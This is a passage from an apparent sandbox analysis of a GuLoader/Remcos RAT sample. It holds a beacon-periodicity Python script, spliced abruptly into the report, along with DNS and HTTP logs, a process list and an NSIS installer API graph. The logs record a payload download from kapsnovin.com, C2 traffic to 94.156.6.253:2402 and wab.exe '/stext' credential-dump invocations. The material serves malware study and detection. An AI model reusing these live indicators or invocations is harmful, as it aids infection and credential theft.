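Oct 23, 2023 20:41:39.131377935 CEST 2402 50037 94.156.6.253 192.168.11.20
Oct 23, 2023 20:42:08.763279915 CEST 2402 50037 94.156.6.253 192.168.11.20
Oct 23, 2023 20:42:09.131537914 CEST 2402 50037 94.156.6.253 192.168.11.20
Oct 23, 2023 20:42:38.787746906 CEST 2402 50037 94.156.6.253 192.168.11.20
Oct 23, 2023 20:42:39.163062096 CEST 2402 50037 94.156.6.253 192.168.11.20
Oct 23, 2023 20:41:30.439804077 CEST 50039 80 192.168.11.20 178.237.33.50
Oct 23, 2023 20:41:31.220779896 CEST 50039 80 192.168.11.20 178.237.33.50
Oct 23, 2023 20:41:32.782917976 CEST 50039 80 192.168.11.20 178.237.33.50
Oct 23, 2023 20:41:35.891735077 CEST 50039 80 192.168.11.20 178.237.33.50
Oct 23, 2023 20:41:42.093370914 CEST 50039 80 192.168.11.20 178.237.33.50
Oct 23, 2023 20:41:54.497091055 CEST 50039 80 192.168.11.20 178.237.33.50
Oct 23, 2023 20:42:19.304114103 CEST 50039 80 192.168.11.20 178.237.33.50
"""

_EPOCH = datetime(1970, 1, 1)


def parse_row(line):
    """Split one row into (seconds, src_port, dst_port, src_ip, dst_ip)."""
    ts_text, sport, dport, sip, dip = line.rsplit(" ", 4)
    # strptime's %f takes at most six fractional digits and the report has
    # nine, so the fraction is added by hand. Only differences between
    # timestamps matter here, so the CEST offset is simply dropped.
    base, frac = ts_text.replace(" CEST", "").rsplit(".", 1)
    whole = (datetime.strptime(base, "%b %d, %Y %H:%M:%S") - _EPOCH).total_seconds()
    return whole + int(frac) / 10 ** len(frac), int(sport), int(dport), sip, dip


def remote_endpoint(sport, dport, sip, dip):
    """Key a packet by its non-local side so both directions land in one flow."""
    return (sip, sport) if sip != LOCAL_IP else (dip, dport)


def burst_starts(times, gap):
    """Collapse packets closer than `gap` seconds into one burst start time,
    so a keepalive plus its ACK and reply count as a single beat."""
    starts, last = [], None
    for t in sorted(times):
        if last is None or t - last > gap:
            starts.append(t)
        last = t
    return starts


def periodicity(times, gap=2.0, min_samples=4, tolerance=0.05):
    """Return period/jitter statistics for one flow, or None if too few beats."""
    starts = burst_starts(times, gap)
    intervals = [b - a for a, b in zip(starts, starts[1:])]
    if len(intervals) < min_samples:
        return None
    period = median(intervals)
    jitter = median(abs(i - period) for i in intervals)  # median absolute deviation
    return {"samples": len(intervals), "period": period, "jitter": jitter,
            "periodic": jitter <= tolerance * period}


def analyse(rows=ROWS, **thresholds):
    """Group rows by remote endpoint and score every flow for periodicity."""
    by_remote = defaultdict(list)
    for line in rows.strip().splitlines():
        seconds, sport, dport, sip, dip = parse_row(line)
        by_remote[remote_endpoint(sport, dport, sip, dip)].append(seconds)
    return {f"{ip}:{port}": periodicity(ts, **thresholds)
            for (ip, port), ts in by_remote.items()}


if __name__ == "__main__":
    for endpoint, stats in analyse().items():
        print(endpoint, stats)
```

For 94.156.6.253:2402 the check reports a period of about 30.0 s with a few milliseconds of jitter, which is what a fixed-interval keepalive looks like. For 178.237.33.50:80 the gaps roughly double from one packet to the next (0.8, 1.6, 3.1, 6.2, 12.4, 24.8 s), a backoff pattern rather than a beacon, and the flow comes back with periodic set to False. The same statistic over a longer window would be the starting point for a detection; the thresholds here are tuned to this short capture only.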
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Oct 23, 2023 20:39:40.455195904 CEST  59418     53  192.168.11.20    1.1.1.1
Oct 23, 2023 20:39:41.087702036 CEST     53  59418  1.1.1.1          192.168.11.20
Oct 23, 2023 20:39:44.575050116 CEST  64550     53  192.168.11.20    1.1.1.1
Oct 23, 2023 20:39:44.823290110 CEST     53  64550  1.1.1.1          192.168.11.20
Oct 23, 2023 20:39:45.823678017 CEST  58803     53  192.168.11.20    1.1.1.1
Oct 23, 2023 20:39:45.990742922 CEST     53  58803  1.1.1.1          192.168.11.20
                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                        Oct 23, 2023 20:39:40.455195904 CEST192.168.11.201.1.1.10xcddStandard query (0)kapsnovin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Oct 23, 2023 20:39:44.575050116 CEST192.168.11.201.1.1.10xa7bcStandard query (0)ourt2949aslumes9.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Oct 23, 2023 20:39:45.823678017 CEST192.168.11.201.1.1.10x5559Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                        Oct 23, 2023 20:39:41.087702036 CEST1.1.1.1192.168.11.200xcddNo error (0)kapsnovin.com77.238.121.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Oct 23, 2023 20:39:44.823290110 CEST1.1.1.1192.168.11.200xa7bcName error (3)ourt2949aslumes9.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Oct 23, 2023 20:39:45.990742922 CEST1.1.1.1192.168.11.200x5559No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                        • kapsnovin.com
                                                                                                                                                                                                        • geoplugin.net
                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                        0192.168.11.205003677.238.121.25080C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | kBytes transferred | Direction | Data
Oct 23, 2023 20:39:41.494599104 CEST | 0 | OUT | GET /KvGfOfeyMpEaqpzI164.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Host: kapsnovin.com
Cache-Control: no-cache
Oct 23, 2023 20:39:41.890747070 CEST | 3 | IN | HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: application/octet-stream
last-modified: Wed, 11 Oct 2023 04:41:30 GMT
accept-ranges: bytes
content-length: 494656
date: Mon, 23 Oct 2023 18:39:41 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.11.20 | 50039 | 178.237.33.50 | 80 | C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | kBytes transferred | Direction | Data
Oct 23, 2023 20:39:46.307024956 CEST | 526 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Oct 23, 2023 20:39:46.627927065 CEST | 533 | IN | HTTP/1.1 200 OK
date: Mon, 23 Oct 2023 18:39:46 GMT
server: Apache
content-length: 973
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
                                                                                                                                                                                                        Data Ascii: { "geoplugin_request":"102.129.145.32", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Los Angeles", "geoplugin_region":"California", "geoplugin_regionCode":"CA", "geoplugin_regionName":"California", "geoplugin_areaCode":"", "geoplugin_dmaCode":"803", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"34.0544", "geoplugin_longitude":"-118.2441", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Los_Angeles", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                        Start time:20:39:21
                                                                                                                                                                                                        Start date:23/10/2023
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:2'729'832 bytes
                                                                                                                                                                                                        MD5 hash:B434372E36A7D17BC61C8062BBC14015
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.12043367453.0000000000627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.12044516719.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                        Start time:20:39:29
                                                                                                                                                                                                        Start date:23/10/2023
                                                                                                                                                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
Commandline:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
Imagebase:0xc70000
File size:516'608 bytes
MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.16907433078.00000000030B1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:moderate
Has exited:false

Target ID:4
Start time:20:39:48
Start date:23/10/2023
Path:C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):true
Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uhrhlaw
Imagebase:0xc70000
File size:516'608 bytes
MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:5
Start time:20:39:48
Start date:23/10/2023
Path:C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):true
Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ebwamkguuyj
Imagebase:0xc70000
File size:516'608 bytes
MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:6
Start time:20:39:48
Start date:23/10/2023
Path:C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):true
Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gdbsndrnigbudr
Imagebase:0xc70000
File size:516'608 bytes
MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true


Execution Graph

Execution Coverage:21.1%
Dynamic/Decrypted Code Coverage:13.8%
Signature Coverage:20.8%
Total number of Nodes:1525
Total number of Limit Nodes:47
5215->5216 5217 4024a8 5216->5217 5218 402ba2 18 API calls 5217->5218 5219 4024b1 5218->5219 5220 4024d5 RegEnumValueW 5219->5220 5221 4024c9 RegEnumKeyW 5219->5221 5223 40281e 5219->5223 5222 4024ee RegCloseKey 5220->5222 5220->5223 5221->5222 5222->5223 5225 40231f 5226 402324 5225->5226 5227 40234f 5225->5227 5229 402cc9 19 API calls 5226->5229 5228 402bbf 18 API calls 5227->5228 5230 402356 5228->5230 5231 40232b 5229->5231 5236 402bff RegOpenKeyExW 5230->5236 5232 402bbf 18 API calls 5231->5232 5235 40236c 5231->5235 5234 40233c RegDeleteValueW RegCloseKey 5232->5234 5234->5235 5240 402c2a 5236->5240 5245 402c76 5236->5245 5237 402c50 RegEnumKeyW 5238 402c62 RegCloseKey 5237->5238 5237->5240 5241 40642a 5 API calls 5238->5241 5239 402c87 RegCloseKey 5239->5245 5240->5237 5240->5238 5240->5239 5242 402bff 5 API calls 5240->5242 5243 402c72 5241->5243 5242->5240 5244 402ca2 RegDeleteKeyW 5243->5244 5243->5245 5244->5245 5245->5235 3682 4032a0 SetErrorMode GetVersion 3683 4032d5 3682->3683 3684 4032db 3682->3684 3685 40642a 5 API calls 3683->3685 3770 4063ba GetSystemDirectoryW 3684->3770 3685->3684 3687 4032f1 lstrlenA 3687->3684 3688 403301 3687->3688 3773 40642a GetModuleHandleA 3688->3773 3691 40642a 5 API calls 3692 403310 #17 OleInitialize SHGetFileInfoW 3691->3692 3779 406050 lstrcpynW 3692->3779 3694 40334d GetCommandLineW 3780 406050 lstrcpynW 3694->3780 3696 40335f GetModuleHandleW 3697 403377 3696->3697 3781 405a31 3697->3781 3700 4034b0 GetTempPathW 3785 40326f 3700->3785 3702 4034c8 3703 403522 DeleteFileW 3702->3703 3704 4034cc GetWindowsDirectoryW lstrcatW 3702->3704 3795 402dee GetTickCount GetModuleFileNameW 3703->3795 3707 40326f 12 API calls 3704->3707 3706 40339f 3708 405a31 CharNextW 3706->3708 3713 403499 3706->3713 3716 40349b 3706->3716 3710 4034e8 3707->3710 3708->3706 3709 403536 3711 4035e9 3709->3711 3714 4035d9 3709->3714 3718 405a31 CharNextW 3709->3718 3710->3703 3712 4034ec GetTempPathW lstrcatW SetEnvironmentVariableW 
SetEnvironmentVariableW 3710->3712 3896 4037bf 3711->3896 3717 40326f 12 API calls 3712->3717 3713->3700 3823 403899 3714->3823 3879 406050 lstrcpynW 3716->3879 3722 40351a 3717->3722 3735 403555 3718->3735 3722->3703 3722->3711 3723 403723 3725 4037a7 ExitProcess 3723->3725 3726 40372b GetCurrentProcess OpenProcessToken 3723->3726 3724 403603 3903 405795 3724->3903 3728 403743 LookupPrivilegeValueW AdjustTokenPrivileges 3726->3728 3729 403777 3726->3729 3728->3729 3734 40642a 5 API calls 3729->3734 3731 4035b3 3880 405b0c 3731->3880 3732 403619 3907 405718 3732->3907 3739 40377e 3734->3739 3735->3731 3735->3732 3743 403793 ExitWindowsEx 3739->3743 3746 4037a0 3739->3746 3741 40363a lstrcatW lstrcmpiW 3741->3711 3745 403656 3741->3745 3742 40362f lstrcatW 3742->3741 3743->3725 3743->3746 3748 403662 3745->3748 3749 40365b 3745->3749 3945 40140b 3746->3945 3747 4035ce 3895 406050 lstrcpynW 3747->3895 3915 4056fb CreateDirectoryW 3748->3915 3910 40567e CreateDirectoryW 3749->3910 3755 403667 SetCurrentDirectoryW 3756 403682 3755->3756 3757 403677 3755->3757 3919 406050 lstrcpynW 3756->3919 3918 406050 lstrcpynW 3757->3918 3762 4036ce CopyFileW 3767 403690 3762->3767 3763 403717 3765 405ef1 38 API calls 3763->3765 3765->3711 3766 406072 18 API calls 3766->3767 3767->3763 3767->3766 3769 403702 CloseHandle 3767->3769 3920 406072 3767->3920 3938 405ef1 MoveFileExW 3767->3938 3942 405730 CreateProcessW 3767->3942 3769->3767 3771 4063dc wsprintfW LoadLibraryExW 3770->3771 3771->3687 3774 406450 GetProcAddress 3773->3774 3775 406446 3773->3775 3777 403309 3774->3777 3776 4063ba 3 API calls 3775->3776 3778 40644c 3776->3778 3777->3691 3778->3774 3778->3777 3779->3694 3780->3696 3782 405a37 3781->3782 3783 403386 CharNextW 3782->3783 3784 405a3e CharNextW 3782->3784 3783->3700 3783->3706 3784->3782 3948 4062e4 3785->3948 3787 403285 3787->3702 3788 40327b 3788->3787 3957 405a04 lstrlenW CharPrevW 3788->3957 3791 4056fb 2 API calls 3792 403293 3791->3792 3960 405c54 
3792->3960 3964 405c25 GetFileAttributesW CreateFileW 3795->3964 3797 402e2e 3815 402e3e 3797->3815 3965 406050 lstrcpynW 3797->3965 3799 402e54 3966 405a50 lstrlenW 3799->3966 3803 402e65 GetFileSize 3804 402f61 3803->3804 3822 402e7c 3803->3822 3971 402d8a 3804->3971 3806 402f6a 3808 402f9a GlobalAlloc 3806->3808 3806->3815 4006 403258 SetFilePointer 3806->4006 3982 403258 SetFilePointer 3808->3982 3810 402fcd 3814 402d8a 6 API calls 3810->3814 3812 402f83 3816 403242 ReadFile 3812->3816 3813 402fb5 3983 403027 3813->3983 3814->3815 3815->3709 3818 402f8e 3816->3818 3818->3808 3818->3815 3819 402d8a 6 API calls 3819->3822 3820 402fc1 3820->3815 3820->3820 3821 402ffe SetFilePointer 3820->3821 3821->3815 3822->3804 3822->3810 3822->3815 3822->3819 4003 403242 3822->4003 3824 40642a 5 API calls 3823->3824 3825 4038ad 3824->3825 3826 4038b3 3825->3826 3827 4038c5 3825->3827 4041 405f97 wsprintfW 3826->4041 3828 405f1d 3 API calls 3827->3828 3829 4038f5 3828->3829 3831 403914 lstrcatW 3829->3831 3833 405f1d 3 API calls 3829->3833 3832 4038c3 3831->3832 4027 403b6f 3832->4027 3833->3831 3836 405b0c 18 API calls 3837 403946 3836->3837 3838 4039da 3837->3838 4036 405f1d RegOpenKeyExW 3837->4036 3839 405b0c 18 API calls 3838->3839 3842 4039e0 3839->3842 3841 4039f0 LoadImageW 3845 403a96 3841->3845 3846 403a17 RegisterClassW 3841->3846 3842->3841 3844 406072 18 API calls 3842->3844 3844->3841 3849 40140b 2 API calls 3845->3849 3848 403a4d SystemParametersInfoW CreateWindowExW 3846->3848 3878 403aa0 3846->3878 3847 403999 lstrlenW 3852 4039a7 lstrcmpiW 3847->3852 3853 4039cd 3847->3853 3848->3845 3850 403a9c 3849->3850 3857 403b6f 19 API calls 3850->3857 3850->3878 3851 405a31 CharNextW 3855 403996 3851->3855 3852->3853 3856 4039b7 GetFileAttributesW 3852->3856 3854 405a04 3 API calls 3853->3854 3858 4039d3 3854->3858 3855->3847 3859 4039c3 3856->3859 3861 403aad 3857->3861 4042 406050 lstrcpynW 3858->4042 3859->3853 3860 405a50 2 API calls 3859->3860 3860->3853 3863 
403ab9 ShowWindow 3861->3863 3864 403b3c 3861->3864 3866 4063ba 3 API calls 3863->3866 4043 405282 OleInitialize 3864->4043 3868 403ad1 3866->3868 3867 403b42 3869 403b46 3867->3869 3870 403b5e 3867->3870 3871 403adf GetClassInfoW 3868->3871 3873 4063ba 3 API calls 3868->3873 3876 40140b 2 API calls 3869->3876 3869->3878 3872 40140b 2 API calls 3870->3872 3874 403af3 GetClassInfoW RegisterClassW 3871->3874 3875 403b09 DialogBoxParamW 3871->3875 3872->3878 3873->3871 3874->3875 3877 40140b 2 API calls 3875->3877 3876->3878 3877->3878 3878->3711 3879->3713 4058 406050 lstrcpynW 3880->4058 3882 405b1d 4059 405aaf CharNextW CharNextW 3882->4059 3885 4035bf 3885->3711 3894 406050 lstrcpynW 3885->3894 3886 4062e4 5 API calls 3892 405b33 3886->3892 3887 405b64 lstrlenW 3888 405b6f 3887->3888 3887->3892 3890 405a04 3 API calls 3888->3890 3891 405b74 GetFileAttributesW 3890->3891 3891->3885 3892->3885 3892->3887 3893 405a50 2 API calls 3892->3893 4065 406393 FindFirstFileW 3892->4065 3893->3887 3894->3747 3895->3714 3897 4037d7 3896->3897 3898 4037c9 CloseHandle 3896->3898 4068 403804 3897->4068 3898->3897 3905 4057aa 3903->3905 3904 403611 ExitProcess 3905->3904 3906 4057be MessageBoxIndirectW 3905->3906 3906->3904 3908 40642a 5 API calls 3907->3908 3909 40361e lstrcatW 3908->3909 3909->3741 3909->3742 3911 403660 3910->3911 3912 4056cf GetLastError 3910->3912 3911->3755 3912->3911 3913 4056de SetFileSecurityW 3912->3913 3913->3911 3914 4056f4 GetLastError 3913->3914 3914->3911 3916 40570b 3915->3916 3917 40570f GetLastError 3915->3917 3916->3755 3917->3916 3918->3756 3919->3767 3925 40607f 3920->3925 3921 4062ca 3922 4036c1 DeleteFileW 3921->3922 4126 406050 lstrcpynW 3921->4126 3922->3762 3922->3767 3924 406132 GetVersion 3924->3925 3925->3921 3925->3924 3926 406298 lstrlenW 3925->3926 3929 406072 10 API calls 3925->3929 3930 4061ad GetSystemDirectoryW 3925->3930 3931 405f1d 3 API calls 3925->3931 3932 4061c0 GetWindowsDirectoryW 3925->3932 3933 4062e4 5 API calls 
3925->3933 3934 4061f4 SHGetSpecialFolderLocation 3925->3934 3935 406072 10 API calls 3925->3935 3936 406239 lstrcatW 3925->3936 4124 405f97 wsprintfW 3925->4124 4125 406050 lstrcpynW 3925->4125 3926->3925 3929->3926 3930->3925 3931->3925 3932->3925 3933->3925 3934->3925 3937 40620c SHGetPathFromIDListW CoTaskMemFree 3934->3937 3935->3925 3936->3925 3937->3925 3939 405f12 3938->3939 3940 405f05 3938->3940 3939->3767 4127 405d7f lstrcpyW 3940->4127 3943 405763 CloseHandle 3942->3943 3944 40576f 3942->3944 3943->3944 3944->3767 3946 401389 2 API calls 3945->3946 3947 401420 3946->3947 3947->3725 3955 4062f1 3948->3955 3949 40636c CharPrevW 3953 406367 3949->3953 3950 40635a CharNextW 3950->3953 3950->3955 3951 40638d 3951->3788 3952 405a31 CharNextW 3952->3955 3953->3949 3953->3951 3954 406346 CharNextW 3954->3955 3955->3950 3955->3952 3955->3953 3955->3954 3956 406355 CharNextW 3955->3956 3956->3950 3958 405a20 lstrcatW 3957->3958 3959 40328d 3957->3959 3958->3959 3959->3791 3961 405c61 GetTickCount GetTempFileNameW 3960->3961 3962 40329e 3961->3962 3963 405c97 3961->3963 3962->3702 3963->3961 3963->3962 3964->3797 3965->3799 3967 405a5e 3966->3967 3968 402e5a 3967->3968 3969 405a64 CharPrevW 3967->3969 3970 406050 lstrcpynW 3968->3970 3969->3967 3969->3968 3970->3803 3972 402d93 3971->3972 3973 402dab 3971->3973 3974 402da3 3972->3974 3975 402d9c DestroyWindow 3972->3975 3976 402db3 3973->3976 3977 402dbb GetTickCount 3973->3977 3974->3806 3975->3974 4007 406466 3976->4007 3979 402dc9 CreateDialogParamW ShowWindow 3977->3979 3980 402dec 3977->3980 3979->3980 3980->3806 3982->3813 3984 403040 3983->3984 3985 40306e 3984->3985 4013 403258 SetFilePointer 3984->4013 3987 403242 ReadFile 3985->3987 3988 403079 3987->3988 3989 4031c5 3988->3989 3990 4031db 3988->3990 3991 40308b GetTickCount 3988->3991 3989->3820 3992 40321d 3990->3992 3995 4031df 3990->3995 3991->3989 3996 4030da 3991->3996 3994 403242 ReadFile 3992->3994 3993 403242 ReadFile 3993->3996 3994->3989 
3995->3989 3997 403242 ReadFile 3995->3997 3998 405cd7 WriteFile 3995->3998 3996->3989 3996->3993 3999 403130 GetTickCount 3996->3999 4000 403155 MulDiv wsprintfW 3996->4000 4011 405cd7 WriteFile 3996->4011 3997->3995 3998->3995 3999->3996 4014 4051af 4000->4014 4025 405ca8 ReadFile 4003->4025 4006->3812 4008 406483 PeekMessageW 4007->4008 4009 402db9 4008->4009 4010 406479 DispatchMessageW 4008->4010 4009->3806 4010->4008 4012 405cf5 4011->4012 4012->3996 4013->3985 4015 4051ca 4014->4015 4024 40526c 4014->4024 4016 4051e6 lstrlenW 4015->4016 4017 406072 18 API calls 4015->4017 4018 4051f4 lstrlenW 4016->4018 4019 40520f 4016->4019 4017->4016 4020 405206 lstrcatW 4018->4020 4018->4024 4021 405222 4019->4021 4022 405215 SetWindowTextW 4019->4022 4020->4019 4023 405228 SendMessageW SendMessageW SendMessageW 4021->4023 4021->4024 4022->4021 4023->4024 4024->3996 4026 403255 4025->4026 4026->3822 4028 403b83 4027->4028 4050 405f97 wsprintfW 4028->4050 4030 403bf4 4031 406072 18 API calls 4030->4031 4032 403c00 SetWindowTextW 4031->4032 4033 403924 4032->4033 4034 403c1c 4032->4034 4033->3836 4034->4033 4035 406072 18 API calls 4034->4035 4035->4034 4037 403978 4036->4037 4038 405f51 RegQueryValueExW 4036->4038 4037->3838 4037->3847 4037->3851 4039 405f72 RegCloseKey 4038->4039 4039->4037 4041->3832 4042->3838 4051 404160 4043->4051 4045 4052cc 4046 404160 SendMessageW 4045->4046 4047 4052de OleUninitialize 4046->4047 4047->3867 4048 4052a5 4048->4045 4054 401389 4048->4054 4050->4030 4052 404178 4051->4052 4053 404169 SendMessageW 4051->4053 4052->4048 4053->4052 4055 401390 4054->4055 4056 4013fe 4055->4056 4057 4013cb MulDiv SendMessageW 4055->4057 4056->4048 4057->4055 4058->3882 4060 405acc 4059->4060 4064 405ade 4059->4064 4061 405ad9 CharNextW 4060->4061 4060->4064 4062 405b02 4061->4062 4062->3885 4062->3886 4063 405a31 CharNextW 4063->4064 4064->4062 4064->4063 4066 4063b4 4065->4066 4067 4063a9 FindClose 4065->4067 4066->3892 4067->4066 4069 403812 4068->4069 
4070 4037dc 4069->4070 4071 403817 FreeLibrary GlobalFree 4069->4071 4072 405841 4070->4072 4071->4070 4071->4071 4073 405b0c 18 API calls 4072->4073 4074 405861 4073->4074 4075 405880 4074->4075 4076 405869 DeleteFileW 4074->4076 4078 4059ab 4075->4078 4111 406050 lstrcpynW 4075->4111 4077 4035f2 OleUninitialize 4076->4077 4077->3723 4077->3724 4078->4077 4085 406393 2 API calls 4078->4085 4080 4058a6 4081 4058b9 4080->4081 4082 4058ac lstrcatW 4080->4082 4084 405a50 2 API calls 4081->4084 4083 4058bf 4082->4083 4086 4058cf lstrcatW 4083->4086 4088 4058da lstrlenW FindFirstFileW 4083->4088 4084->4083 4087 4059c5 4085->4087 4086->4088 4087->4077 4089 4059c9 4087->4089 4091 4059a0 4088->4091 4109 4058fc 4088->4109 4090 405a04 3 API calls 4089->4090 4092 4059cf 4090->4092 4091->4078 4094 4057f9 5 API calls 4092->4094 4093 405983 FindNextFileW 4097 405999 FindClose 4093->4097 4093->4109 4096 4059db 4094->4096 4098 4059f5 4096->4098 4099 4059df 4096->4099 4097->4091 4101 4051af 25 API calls 4098->4101 4099->4077 4103 4051af 25 API calls 4099->4103 4101->4077 4102 405841 62 API calls 4102->4109 4104 4059ec 4103->4104 4105 405ef1 38 API calls 4104->4105 4107 4059f3 4105->4107 4106 4051af 25 API calls 4106->4093 4107->4077 4108 4051af 25 API calls 4108->4109 4109->4093 4109->4102 4109->4106 4109->4108 4110 405ef1 38 API calls 4109->4110 4112 406050 lstrcpynW 4109->4112 4113 4057f9 4109->4113 4110->4109 4111->4080 4112->4109 4121 405c00 GetFileAttributesW 4113->4121 4116 405814 RemoveDirectoryW 4118 405822 4116->4118 4117 40581c DeleteFileW 4117->4118 4119 405826 4118->4119 4120 405832 SetFileAttributesW 4118->4120 4119->4109 4120->4119 4122 405c12 SetFileAttributesW 4121->4122 4123 405805 4121->4123 4122->4123 4123->4116 4123->4117 4123->4119 4124->3925 4125->3925 4126->3922 4128 405da7 4127->4128 4129 405dcd GetShortPathNameW 4127->4129 4154 405c25 GetFileAttributesW CreateFileW 4128->4154 4131 405de2 4129->4131 4132 405eec 4129->4132 4131->4132 4134 405dea wsprintfA 
4131->4134 4132->3939 4133 405db1 CloseHandle GetShortPathNameW 4133->4132 4135 405dc5 4133->4135 4136 406072 18 API calls 4134->4136 4135->4129 4135->4132 4137 405e12 4136->4137 4155 405c25 GetFileAttributesW CreateFileW 4137->4155 4139 405e1f 4139->4132 4140 405e2e GetFileSize GlobalAlloc 4139->4140 4141 405e50 4140->4141 4142 405ee5 CloseHandle 4140->4142 4143 405ca8 ReadFile 4141->4143 4142->4132 4144 405e58 4143->4144 4144->4142 4156 405b8a lstrlenA 4144->4156 4147 405e83 4149 405b8a 4 API calls 4147->4149 4148 405e6f lstrcpyA 4150 405e91 4148->4150 4149->4150 4151 405ec8 SetFilePointer 4150->4151 4152 405cd7 WriteFile 4151->4152 4153 405ede GlobalFree 4152->4153 4153->4142 4154->4133 4155->4139 4157 405bcb lstrlenA 4156->4157 4158 405bd3 4157->4158 4159 405ba4 lstrcmpiA 4157->4159 4158->4147 4158->4148 4159->4158 4160 405bc2 CharNextA 4159->4160 4160->4157 5246 100010e1 5249 10001111 5246->5249 5247 100011d8 GlobalFree 5248 100012ba 2 API calls 5248->5249 5249->5247 5249->5248 5250 100011d3 5249->5250 5251 10001272 2 API calls 5249->5251 5252 10001164 GlobalAlloc 5249->5252 5253 100011f8 GlobalFree 5249->5253 5254 100012e1 lstrcpyW 5249->5254 5255 100011c4 GlobalFree 5249->5255 5250->5247 5251->5255 5252->5249 5253->5249 5254->5249 5255->5249 4352 405123 4353 405133 4352->4353 4354 405147 4352->4354 4355 405139 4353->4355 4365 405190 4353->4365 4356 40514f IsWindowVisible 4354->4356 4360 40516f 4354->4360 4358 404160 SendMessageW 4355->4358 4359 40515c 4356->4359 4356->4365 4357 405195 CallWindowProcW 4361 405143 4357->4361 4358->4361 4366 404a79 SendMessageW 4359->4366 4360->4357 4371 404af9 4360->4371 4365->4357 4367 404ad8 SendMessageW 4366->4367 4368 404a9c GetMessagePos ScreenToClient SendMessageW 4366->4368 4369 404ad0 4367->4369 4368->4369 4370 404ad5 4368->4370 4369->4360 4370->4367 4380 406050 lstrcpynW 4371->4380 4373 404b0c 4381 405f97 wsprintfW 4373->4381 4375 404b16 4376 40140b 2 API calls 4375->4376 4377 404b1f 4376->4377 4382 406050 lstrcpynW 
